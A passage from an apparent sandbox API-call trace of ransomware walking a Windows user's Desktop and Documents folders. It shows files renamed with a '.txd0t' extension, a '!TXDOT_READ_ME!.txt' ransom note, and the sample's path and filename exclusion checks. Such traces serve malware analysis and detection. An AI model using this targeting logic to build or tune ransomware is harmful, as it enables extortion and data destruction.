ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4ae1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ZSfJsNS2sePMKa.pps.txd0t", cAlternateFileName="ZSFJSN~1.TXD")) returned 1 [0119.317] StrCmpW (psz1="ZSfJsNS2sePMKa.pps.txd0t", psz2=".") returned 1 [0119.317] StrCmpW (psz1="ZSfJsNS2sePMKa.pps.txd0t", psz2="..") returned 1 [0119.318] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.318] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.439] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="ZSfJsNS2sePMKa.pps.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps.txd0t" [0119.439] PathFindExtensionW (pszPath="ZSfJsNS2sePMKa.pps.txd0t") returned=".txd0t" [0119.439] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.439] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa54e95c0, ftCreationTime.dwHighDateTime=0x1d5eb66, ftLastAccessTime.dwLowDateTime=0xad201040, ftLastAccessTime.dwHighDateTime=0x1d5e331, ftLastWriteTime.dwLowDateTime=0x512c0027, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x912f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", cAlternateFileName="ZTT1ZU~1.TXD")) returned 1 [0119.439] StrCmpW (psz1="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", psz2=".") returned 1 [0119.439] StrCmpW (psz1="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", psz2="..") returned 1 [0119.439] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.439] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.439] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv.txd0t" [0119.439] PathFindExtensionW (pszPath="ztT1zUqOHSnYLoXvx2_E.csv.txd0t") returned=".txd0t" [0119.439] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.439] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa54e95c0, ftCreationTime.dwHighDateTime=0x1d5eb66, ftLastAccessTime.dwLowDateTime=0xad201040, ftLastAccessTime.dwHighDateTime=0x1d5e331, ftLastWriteTime.dwLowDateTime=0x512c0027, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x912f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", cAlternateFileName="ZTT1ZU~1.TXD")) returned 0 [0119.439] FindClose (in: hFindFile=0xec1bf0 | out: hFindFile=0xec1bf0) returned 1 [0119.439] GetProcessHeap () returned 0xe30000 [0119.439] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.439] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5ad15bdf, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5ad15bdf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0119.439] StrCmpW (psz1="Documents", psz2=".") returned 1 [0119.439] StrCmpW (psz1="Documents", psz2="..") returned 1 [0119.439] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.439] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.439] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Documents", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\boot\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="crypt_detect") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="cryptolocker") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="ransomware") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0119.440] GetProcessHeap () returned 0xe30000 [0119.440] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xef3600 [0119.440] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.440] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\*") returned="C:\\Users\\FD1HVy\\Documents\\*" [0119.440] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5ad15bdf, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5ad15bdf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1df0 [0119.440] StrCmpW (psz1=".", psz2=".") returned 0 [0119.440] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5ad15bdf, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5ad15bdf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.441] StrCmpW (psz1="..", psz2=".") returned 1 [0119.441] StrCmpW (psz1="..", psz2="..") returned 0 [0119.441] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x512e61c6, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x512e61c6, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5130c4da, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.441] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.441] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.441] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.441] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.441] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt" [0119.441] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.441] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.441] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.441] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26df0010, ftCreationTime.dwHighDateTime=0x1d59cda, ftLastAccessTime.dwLowDateTime=0xd76e9320, ftLastAccessTime.dwHighDateTime=0x1d5dd83, ftLastWriteTime.dwLowDateTime=0x512e61c6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9dae, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", cAlternateFileName="-NK0JW~1.TXD")) returned 1 [0119.441] StrCmpW (psz1="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", psz2=".") returned 1 [0119.441] StrCmpW (psz1="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", psz2="..") returned 1 [0119.441] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.441] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.441] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx.txd0t" [0119.441] PathFindExtensionW (pszPath="-nk0Jwf_DtIx7OFnM.xlsx.txd0t") returned=".txd0t" [0119.441] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.441] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd5ddbb0, ftCreationTime.dwHighDateTime=0x1d58f75, ftLastAccessTime.dwLowDateTime=0x9feb6c70, ftLastAccessTime.dwHighDateTime=0x1d57776, ftLastWriteTime.dwLowDateTime=0x512e61c6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf5c7, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="1WQmayKDv.pptx.txd0t", cAlternateFileName="1WQMAY~1.TXD")) returned 1 [0119.442] StrCmpW (psz1="1WQmayKDv.pptx.txd0t", psz2=".") returned 1 [0119.442] StrCmpW (psz1="1WQmayKDv.pptx.txd0t", psz2="..") returned 1 [0119.442] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.442] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.442] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="1WQmayKDv.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx.txd0t" [0119.442] PathFindExtensionW (pszPath="1WQmayKDv.pptx.txd0t") returned=".txd0t" [0119.442] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.442] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe5cd300, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x446fea50, ftLastAccessTime.dwHighDateTime=0x1d59d74, ftLastWriteTime.dwLowDateTime=0x5130c4da, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18c63, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="27kj6w0qCAmGPNM.docx.txd0t", cAlternateFileName="27KJ6W~1.TXD")) returned 1 [0119.442] StrCmpW (psz1="27kj6w0qCAmGPNM.docx.txd0t", psz2=".") returned 1 [0119.442] StrCmpW (psz1="27kj6w0qCAmGPNM.docx.txd0t", psz2="..") returned 1 [0119.442] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.442] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.442] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="27kj6w0qCAmGPNM.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx.txd0t" [0119.442] PathFindExtensionW (pszPath="27kj6w0qCAmGPNM.docx.txd0t") returned=".txd0t" [0119.442] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.442] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb38f350, ftCreationTime.dwHighDateTime=0x1d57bb4, ftLastAccessTime.dwLowDateTime=0xfe7a2f50, ftLastAccessTime.dwHighDateTime=0x1d567f0, ftLastWriteTime.dwLowDateTime=0x51332989, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1373b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="4oSJqKCx.docx.txd0t", cAlternateFileName="4OSJQK~1.TXD")) returned 1 [0119.442] StrCmpW (psz1="4oSJqKCx.docx.txd0t", psz2=".") returned 1 [0119.442] StrCmpW (psz1="4oSJqKCx.docx.txd0t", psz2="..") returned 1 [0119.442] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.442] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.442] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="4oSJqKCx.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx.txd0t" [0119.442] PathFindExtensionW (pszPath="4oSJqKCx.docx.txd0t") returned=".txd0t" [0119.442] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.442] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31841f70, ftCreationTime.dwHighDateTime=0x1d5e5a3, ftLastAccessTime.dwLowDateTime=0xc216dad0, ftLastAccessTime.dwHighDateTime=0x1d5e497, ftLastWriteTime.dwLowDateTime=0x51332989, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6042, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="6IKlp7h.ppt.txd0t", cAlternateFileName="6IKLP7~1.TXD")) returned 1 [0119.442] StrCmpW (psz1="6IKlp7h.ppt.txd0t", psz2=".") returned 1 [0119.442] StrCmpW (psz1="6IKlp7h.ppt.txd0t", psz2="..") returned 1 [0119.442] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.442] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.442] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="6IKlp7h.ppt.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt.txd0t" [0119.442] PathFindExtensionW (pszPath="6IKlp7h.ppt.txd0t") returned=".txd0t" [0119.442] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.442] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528b4870, ftCreationTime.dwHighDateTime=0x1d5e1ce, ftLastAccessTime.dwLowDateTime=0xad54a8d0, ftLastAccessTime.dwHighDateTime=0x1d5ed79, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13841, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", cAlternateFileName="7D9VJ0~1.TXD")) returned 1 [0119.443] StrCmpW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", psz2=".") returned 1 [0119.443] StrCmpW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", psz2="..") returned 1 [0119.443] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.443] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.443] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t" [0119.443] PathFindExtensionW (pszPath="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t") returned=".txd0t" [0119.443] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.443] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b06ef30, ftCreationTime.dwHighDateTime=0x1d5b702, ftLastAccessTime.dwLowDateTime=0xf6036630, ftLastAccessTime.dwHighDateTime=0x1d5b939, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5c15, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", cAlternateFileName="82F_2P~1.TXD")) returned 1 [0119.443] StrCmpW (psz1="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", psz2=".") returned 1 [0119.443] StrCmpW (psz1="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", psz2="..") returned 1 [0119.443] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.443] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.443] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx.txd0t" [0119.443] PathFindExtensionW (pszPath="82f_2PILY3Rkg8CydxKr.xlsx.txd0t") returned=".txd0t" [0119.443] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.443] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979d05c0, ftCreationTime.dwHighDateTime=0x1d566bd, ftLastAccessTime.dwLowDateTime=0x55372160, ftLastAccessTime.dwHighDateTime=0x1d5a7a0, ftLastWriteTime.dwLowDateTime=0x513a4d8f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17cd1, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", cAlternateFileName="9H_SL9~1.TXD")) returned 1 [0119.443] StrCmpW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", psz2=".") returned 1 [0119.443] StrCmpW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", psz2="..") returned 1 [0119.443] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.443] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.443] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx.txd0t" [0119.443] PathFindExtensionW (pszPath="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t") returned=".txd0t" [0119.443] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.443] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee80daf0, ftCreationTime.dwHighDateTime=0x1d5eda0, ftLastAccessTime.dwLowDateTime=0x640a9100, ftLastAccessTime.dwHighDateTime=0x1d5c2de, ftLastWriteTime.dwLowDateTime=0x513cafee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1c20, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="aayLh9Av.xlsx.txd0t", cAlternateFileName="AAYLH9~1.TXD")) returned 1 [0119.443] StrCmpW (psz1="aayLh9Av.xlsx.txd0t", psz2=".") returned 1 [0119.443] StrCmpW (psz1="aayLh9Av.xlsx.txd0t", psz2="..") returned 1 [0119.443] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.443] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 